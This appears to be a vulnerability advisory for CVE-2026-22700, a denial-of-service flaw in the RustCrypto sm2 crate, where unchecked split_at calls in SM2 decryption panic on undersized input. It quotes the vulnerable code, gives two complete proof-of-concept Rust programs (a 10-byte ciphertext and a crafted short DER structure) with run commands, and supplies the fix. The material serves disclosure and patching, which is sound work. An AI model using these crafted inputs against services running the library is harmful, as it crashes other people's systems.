CVE-2026-22700 is a high severity vulnerability with a CVSS score of 7.5. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
A denial-of-service vulnerability exists in the SM2 public-key encryption (PKE) implementation: the decrypt() path performs unchecked slice::split_at operations on input buffers derived from untrusted ciphertext. An attacker can submit short/undersized ciphertext or carefully-crafted DER-encoded structures to trigger bounds-check panics (Rust unwinding) which crash the calling thread or process.
File: src/pke/decrypting.rs
Functions: DecryptingKey::decrypt_digest/decrypt/decrypt_der, internal decrypt() implementation
Affected releases:
The vulnerability is located in the file sm2/src/pke/decrypting.rs. The fundamental cause of the vulnerability is that the decryption function does not strictly check the ciphertext's format and length information. Consequently, a maliciously crafted ciphertext can trigger Rust's panic mechanism instead of the expected error handling (Error) mechanism. The Rust function C.split_at(L) will trigger a Panic if the length is less than L, as shown in the code comment below: the decrypting function has at least three locations where a slice operation might trigger a Panic.
fn decrypt(
secret_scalar: &Scalar,
mode: Mode,
hasher: &mut dyn DynDigest,
cipher: &[u8],
) -> Result<Vec<u8>> {
let q = U256::from_be_hex(FieldElement::MODULUS);
let c1_len = q.bits().div_ceil(8) * 2 + 1; // Typically 65 for SM2
// B1: get 𝐶1 from 𝐶
let (c1, c) = cipher.split_at(c1_len as usize); // PANIC HERE if cipher.len() < 65
let encoded_c1 = EncodedPoint::from_bytes(c1).map_err(Error::from)?;
// ... (lines 170-178 omitted)
let digest_size = hasher.output_size(); // Typically 32 for SM3
let (c2, c3) = match mode {
Mode::C1C3C2 => {
let (c3, c2) = c.split_at(digest_size); // PANIC HERE if c.len() < 32
(c2, c3)
}
Mode::C1C2C3 => c.split_at(c.len() - digest_size), // PANIC HERE if c.len() < 32
};
Rust's slice::split_at panics when the split index is greater than the slice length. A panic in library code typically unwinds the thread and can crash an application if not explicitly caught. This means an attacker that can submit ciphertexts to a service using this library may cause a DoS.
Two PoCs were added to this repository under examples/ demonstrating the two
common ways to trigger the issue:
examples/poc_short_ciphertext.rs — constructs a deliberately undersized
ciphertext (e.g., vec![0u8; 10]) and passes it to DecryptingKey::decrypt.
This triggers the cipher.split_at(c1_len) panic.
//! PoC: trigger panic in SM2 decryption by supplying a ciphertext that is shorter
//! than the expected C1 length so that `cipher.split_at(c1_len)` panics.
//!
//! Usage:
//! cargo run --example poc_short_ciphertext
use rand_core::OsRng;
use sm2::pke::DecryptingKey;
use sm2::SecretKey;
fn main() {
// Generate a normal secret key and DecryptingKey instance.
let mut rng = OsRng;
let sk = SecretKey::try_from_rng(&mut rng).expect("failed to generate secret key");
let dk = DecryptingKey::new(sk);
// to trigger the vulnerability in `decrypt()` where it does `cipher.split_at(c1_len)`.
let short_ciphertext = vec![0u8; 10]; // deliberately too short
println!("Calling decrypt with undersized ciphertext (len = {})...", short_ciphertext.len());
// The panic is the PoC for the lack of length validation.
let _ = dk.decrypt(&short_ciphertext);
// If the library were robust, this line would be reached and decrypt would return Err.
println!("decrypt returned (unexpected) - PoC did not panic");
}
examples/poc_der_short.rs — constructs an ASN.1 Cipher structure with
valid-length x/y coordinates (from a generated public key) but with tiny
digest and cipher OCTET STRING fields (1 byte each). When run with the
crate built with --features std, Cipher::from_der accepts the DER and the
call flows into decrypt(), which then panics on the later split_at.
//! Usage:
//! RUST_BACKTRACE=1 cargo run --example poc_der_short --features std
use rand_core::OsRng;
use sm2::SecretKey;
use sm2::pke::DecryptingKey;
fn build_der(x: &[u8], y: &[u8], digest: &[u8], cipher: &[u8]) -> Vec<u8> {
// Build SEQUENCE { INTEGER x, INTEGER y, OCTET STRING digest, OCTET STRING cipher }
let mut body = Vec::new();
// INTEGER x
body.push(0x02);
body.push(x.len() as u8);
body.extend_from_slice(x);
// INTEGER y
body.push(0x02);
body.push(y.len() as u8);
body.extend_from_slice(y);
// OCTET STRING digest (intentionally tiny)
body.push(0x04);
body.push(digest.len() as u8);
body.extend_from_slice(digest);
// OCTET STRING cipher (intentionally tiny)
body.push(0x04);
body.push(cipher.len() as u8);
body.extend_from_slice(cipher);
// SEQUENCE header
let mut der = Vec::new();
der.push(0x30);
der.push(body.len() as u8);
der.extend(body);
der
}
fn main() {
let mut rng = OsRng;
let sk = SecretKey::try_from_rng(&mut rng).expect("failed to generate secret key");
// Extract recipient public key coordinates before moving the secret key into DecryptingKey
let pk = sk.public_key();
let dk = DecryptingKey::new(sk);
// get SEC1 encoding 0x04 || X || Y and slice out X and Y
let sec1 = pk.to_sec1_bytes();
let sec1_ref: &[u8] = sec1.as_ref();
let x = &sec1_ref[1..33];
let y = &sec1_ref[33..65];
// Very small digest and cipher to trigger length-based panics inside decrypt()
let digest = [0x33u8; 1];
let cipher = [0x44u8; 1];
let der = build_der(x, y, &digest, &cipher);
println!("Calling decrypt_der with crafted short DER (len={})...", der.len());
// Expected to panic inside decrypt() due to missing length checks when splitting
let _ = dk.decrypt_der(&der);
println!("decrypt_der returned (unexpected) - PoC did not panic");
}
Reproduction (from repository root):
# PoC that directly uses decrypt on a short buffer
cargo run --example poc_short_ciphertext --features std
# PoC that passes a short DER to decrypt_der
RUST_BACKTRACE=1 cargo run --example poc_der_short --features std
Perform defensive length checks before any split_at usage and return a controlled Err instead of allowing a panic. Minimal fixes in decrypt():
let c1_len_usize = c1_len as usize;
if cipher.len() < c1_len_usize {
return Err(Error);
}
let (c1, c) = cipher.split_at(c1_len_usize);
let digest_size = hasher.output_size();
if c.len() < digest_size {
return Err(Error);
}
let (c2, c3) = match mode {
Mode::C1C3C2 => {
let (c3, c2) = c.split_at(digest_size);
(c2, c3)
}
Mode::C1C2C3 => c.split_at(c.len() - digest_size),
};
After applying these checks, decrypt() will return an error for short or malformed inputs instead of panicking.
This vulnerability was discovered by:
XlabAI Team of Tencent Xuanwu Lab
Atuin Automated Vulnerability Discovery Engine
CVE and credit are preferred.
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| Vendor | Product |
|---|---|
| Rustcrypto | Sm2 Elliptic Curve |
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